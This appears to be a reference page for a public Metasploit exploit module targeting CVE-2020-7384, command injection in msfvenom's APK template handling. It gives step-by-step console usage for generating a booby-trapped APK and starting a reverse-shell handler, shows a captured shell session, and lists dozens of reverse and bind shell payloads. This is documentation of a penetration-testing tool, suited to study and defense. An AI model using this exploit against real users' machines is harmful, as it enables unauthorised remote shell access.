Rapid7 Metasploit Framework msfvenom APK Template Command Injection - Metasploit


This page contains detailed information about how to use the exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Rapid7 Metasploit Framework msfvenom APK Template Command Injection
Module: exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
Source code: modules/exploits/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection.rb
Disclosure date: 2020-10-29
Last modification time: 2021-11-15 14:47:48 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2020-7384

This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x <crafted_file.apk>

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • screen-effects: Module may show something on the screen (Example: a window pops up).

Basic Usage


msf > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show targets
    ... a list of targets ...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > set TARGET target-id
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > show options
    ... show and set options ...
msf exploit(metasploit_msfvenom_apk_template_cmd_injection) > exploit

Knowledge Base


Vulnerable Application


Metasploit Framework's msfvenom is vulnerable to a command injection vulnerability when the user provides a crafted APK file to use as an Android payload template. A "template" file in this context is an existing APK file, within which an Android payload will be embedded.

The vulnerability affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0

A copy of the vulnerable software can be obtained by:

Note that the vulnerable code depends upon the apktool, zipalign and jarsigner tools. That is, regardless of the vulnerability, msfvenom needs these binaries on the PATH for it to even support APK templates.

Attempting to use msfvenom without these dependencies being installed:

% msfvenom -p android/meterpreter/reverse_tcp -x /dev/null -o /dev/null
Using APK template: /dev/null
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: apktool not found. If it's not in your PATH, please add it.

These dependencies are available in Debian's standard repos with jarsigner being provided by openjdk.

% sudo apt update && sudo apt install apktool zipalign default-jdk-headless
<... SNIP ...>

% msfvenom -p android/meterpreter/reverse_tcp -x /dev/null -o /dev/null
Using APK template: /dev/null
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: undefined method `[]' for nil:NilClass

The environment is now ready.

Verification Steps


  1. Install the vulnerable application
  2. Start msfconsole
  3. Do: use unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
  4. Set the payload and payload options as appropriate
  5. Do: exploit
  6. Start a handler
  7. Transfer the generated msf.apk file to the machine running the vulnerable application
  8. On the victim machine, do msfvenom -p android/meterpreter/reverse_tcp -x msf.apk
  9. You should get a shell

Note: Due to the nature of the vulnerability, bash payloads are unlikely to work. If you attempt to use them you will get a warning message when doing exploit.

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[!] Warning: bash payloads are unlikely to work
[+] msf.apk stored at /home/justin/.msf4/local/msf.apk

Options


  • FILENAME - the name of the APK file to produce. Note that it is safe to rename a file after it has been generated.

Scenarios


Metasploit Framework v6.0.11

Generate the APK file

msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST 172.18.0.3
LHOST => 172.18.0.3
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 4444
LPORT => 4444
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > exploit

[+] msf.apk stored at /home/justin/.msf4/local/msf.apk

Start a handler

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.18.0.3
LHOST => 172.18.0.3
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 172.18.0.3:4444

As the victim, use msfvenom to generate an Android payload using the generated file as a template

% ./msfvenom -p android/meterpreter/reverse_tcp -x /home/justin/.msf4/local/msf.apk -o /dev/null
Using APK template: /home/justin/.msf4/local/msf.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
Error: No such file or directory @ rb_sysopen - /tmp/d20201025-4916-ewjqfp/original/AndroidManifest.xml

A shell session will be opened

[*] Command shell session 1 opened (172.18.0.3:4444 -> 172.18.0.3:56220) at 2020-10-25 22:13:43 +1100

id
uid=31337(justin) gid=31337(justin) groups=31337(justin),27(sudo)

Go back to menu.

Msfconsole Usage


Here is how the unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection exploit module looks in the msfconsole:

msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection

[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show info

       Name: Rapid7 Metasploit Framework msfvenom APK Template Command Injection
     Module: exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-10-29

Provided by:
  Justin Steven

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.apk          yes       The APK file name

Payload information:
  Avoid: 5 characters

Description:
  This module exploits a command injection vulnerability in Metasploit 
  Framework's msfvenom payload generator when using a crafted APK file 
  as an Android payload template. Affects Metasploit Framework <= 
  6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this 
  module is a relatively empty yet valid-enough APK file. To trigger 
  the vulnerability, the victim user should do the following: msfvenom 
  -p android/<...> -x <crafted_file.apk>

References:
  https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md
  https://nvd.nist.gov/vuln/detail/CVE-2020-7384

Module Options


This is a complete list of options available in the unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection exploit:

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show options

Module options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.apk          yes       The APK file name

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

   **DisablePayloadHandler: True   (no handler will be created!)**

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection exploit:

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show advanced

Module advanced options (exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   true             no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (cmd/unix/reverse_netcat):

   Name                        Current Setting  Required  Description
   ----                        ---------------  --------  -----------
   AutoRunScript                                no        A script to run automatically on session creation.
   AutoVerifySession           true             yes       Automatically verify and drop invalid sessions
   CommandShellCleanupCommand                   no        A command to run before the session is closed
   CreateSession               true             no        Create a new session for every successful login
   InitialAutoRunScript                         no        An initial script to run on session creation (before AutoRunScript)
   ReverseAllowProxy           false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                   no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                      no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                          no        The specific communication channel to use for this listener
   ReverseListenerThreaded     false            yes       Handle every connection in a new thread (experimental)
   StagerRetryCount            10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait             5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                     false            no        Enable detailed status messages
   WORKSPACE                                    no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection module can exploit:

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection exploit:

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1   payload/cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   2   payload/cmd/unix/bind_jjs                                    normal  No     Unix Command Shell, Bind TCP (via jjs)
   3   payload/cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   4   payload/cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   5   payload/cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   6   payload/cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   7   payload/cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   8   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   9   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   10  payload/cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   11  payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   12  payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   13  payload/cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   14  payload/cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   15  payload/cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   16  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   17  payload/cmd/unix/pingback_bind                               normal  No     Unix Command Shell, Pingback Bind TCP (via netcat)
   18  payload/cmd/unix/pingback_reverse                            normal  No     Unix Command Shell, Pingback Reverse TCP (via netcat)
   19  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   20  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   21  payload/cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   22  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   23  payload/cmd/unix/reverse_bash_udp                            normal  No     Unix Command Shell, Reverse UDP (/dev/udp)
   24  payload/cmd/unix/reverse_jjs                                 normal  No     Unix Command Shell, Reverse TCP (via jjs)
   25  payload/cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   26  payload/cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   27  payload/cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   28  payload/cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   29  payload/cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   30  payload/cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   31  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   32  payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   33  payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   34  payload/cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   35  payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   36  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   37  payload/cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   38  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   39  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   40  payload/cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   41  payload/cmd/unix/reverse_ssh                                 normal  No     Unix Command Shell, Reverse TCP SSH
   42  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   43  payload/cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   44  payload/cmd/unix/reverse_tclsh                               normal  No     Unix Command Shell, Reverse TCP (via Tclsh)
   45  payload/cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   46  payload/generic/custom                                       normal  No     Custom Payload
   47  payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   48  payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Warning: bash payloads are unlikely to work


Here is a relevant code snippet related to the "Warning: bash payloads are unlikely to work" error message:

70:	
71:	    [cert, key]
72:	  end
73:	
74:	  def exploit
75:	    print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash')
76:	    apk = Rex::Zip::Jar.new
77:	    apk.build_manifest
78:	    cert, key = generate_signing_material
79:	    apk.sign(key, cert)
80:	    data = apk.pack

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Justin Steven

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.